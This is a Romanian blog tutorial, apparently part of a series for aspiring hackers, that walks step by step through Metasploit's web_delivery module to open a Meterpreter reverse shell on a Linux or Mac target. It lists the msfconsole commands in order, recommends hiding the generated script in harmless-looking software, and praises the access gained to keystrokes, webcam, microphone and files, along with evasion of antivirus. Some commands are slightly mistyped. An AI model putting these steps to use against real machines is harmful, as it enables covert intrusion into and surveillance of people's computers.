Metasploit pentru hackerii aspiranți #13: Livrare web pentru Linux sau Mac

0

Bine ați revenit, dragii mei greenhorn hackers!

Metasploit, unul dintre instrumentele mele preferate de hacking / pentesting, are atât de multe abilități încât, chiar și după atâtea tutoriale pe care le-am scris, am prezentat doar vârful aisberg-ului. De exemplu, poate fi folosit cu Nexpose pentru scanarea vulnerabilităților, cu Nmap pentru scanarea porturilor, și cu numeroasele module auxiliare, având abilități de hacking aproape nelimitate. Printre modulele de exploatare, o categorie pe care nu am abordat-o sunt exploit-urile de livrare web. Aceste exploit-uri ne permit să deschidem un server web pe sistemul de atac și apoi să generăm o comandă de script simplă care, atunci când este executată pe sistemul victimei, va deschide un shell Meterpreter pe sistemul țintă. Acest exploit de livrare web poate folosi scripturi Python, PHP sau Windows PowerShell. Desigur, este sarcina voastră să puneți scriptul pe computerul țintă. Acest lucru înseamnă că va trebui să obțineți acces fizic la sistem sau să ascundeți codul într-un soft aparent inofensiv pe care victima îl va executa.

În acest tutorial, vom exploata un sistem Linux sau Mac. Deoarece ambele sisteme sunt asemănătoare UNIX, ambii au în mod implicit interpreți Python încorporați. Dacă putem obține comanda de script generată de acest exploit asupra țintei, putem avea control complet asupra sistemului, inclusiv înregistrarea intrărilor de la tastatură, pornirea camerei web, înregistrarea de pe microfon și citirea sau ștergerea oricăror fișiere din sistem.

Să începem.

Pasul 1: Deschidem terminalul

Primul pas, desigur, este să deschidem BlackWebOs, și apoi să deschidem terminalul.

Pasul 2: Metasploit și încărcarea exploit-ului

Deschidem Metasploit tastând:



msfconsole

Această comandă ar trebui să deschidă msfconsole, precum în imaginea de mai jos.

După aceea, trebuie să încărcăm exploatarea:

msf > use exploit/multi/script/web_delivery

Setăm IP-ul sistemului nostru de atac:

msf > set LHOST 10.0.2.15

Urmează să setăm portul pe care dorim să îl folosim:
msf > set LPORT 4444Desigur, eu folosesc adresa IP privată în laboratorul meu, dar dacă țintă este în afara LAN-ului dvs., va trebui probabil să utilizați IP-ul dvs. public și apoi portul înainte.

Pasul 3: Afișarea opțiunilor

Acum, că avem exploit-ul încărcat și e gata de lansare, să aruncăm o privire asupra opțiunilor pentru acest exploit. Tastăm:

msf > show options

Se pare că avem toate opțiunile stabilite de câte ori avem nevoie. Acum, hai să obținem mai multe informații despre acest exploit înainte de a continua. Tastăm următoarea comandă pentru informații:

msf > info



După cum puteți citi mai sus, acest exploit incepe un server web pe sistemul nostru de atac si, atunci cand comanda generată este executată pe sistemul țintă, o sarcina utilă este descărcată victimei. În plus, acest atac nu se scrie pe disc, așadar nu ar trebui să declanșeze software-ul antivirus pe sistemul victimei.

Pasul 4: Pornim Exploitul

Următorul pas este să rulăm exploitul. Se pornește serverul web pe sistemul nostru de atac și se generează, de asemenea, o comandă Python pe care o putem folosi pentru a ne conecta la acest server web. Înainte de a face acest lucru, totuși, trebuie să setăm ținta la 0, selectând exploitul Python.

msf > set target 0

Acum, putem tasta exploitul:

msf > exploit

Observați unde scrie “Run the following command on the target machine” urmată de comanda pe care trebuie să o folosim. Copiați această comandă.

Pasul 5: Rulați comanda pe sistemul victimei

Pe mașina victimei, trebuie să precedăm comanda cu sudo deoarece necesită privilegii de root.

Când ne întoarcem la sistemul BlackWeb OS, putem vedea că un Meterpreter a fost pornit pe sistemul țintă! Deținem acea mașină!

Inițial, Meterpreter rulează în fundal. Pentru a-l aduce în prim-plan, putem scrie:

msf > sessions -l

Această comandă afișează apoi “sesiunile active”. Observați că acest ID al sesiunii este “1.” Apoi, putem activa sesiunea introducând:

msf > sessions – i 1



Următoarea comandă va aduce sesiunea Meterpreter în prim-plan și vom primi promptul! Pentru a controla sistemul, putem rula comenzile sau scripturile Meterpreter, deși majoritatea scripturilor sunt scrise pentru sistemele Windows.

Până data viitoare, să ne citim cu bine! 🙂

 
Choose your Reaction!
Leave a Comment

Your email address will not be published.

Opțiunea copy-paste a fost dezactivată pentru acest site.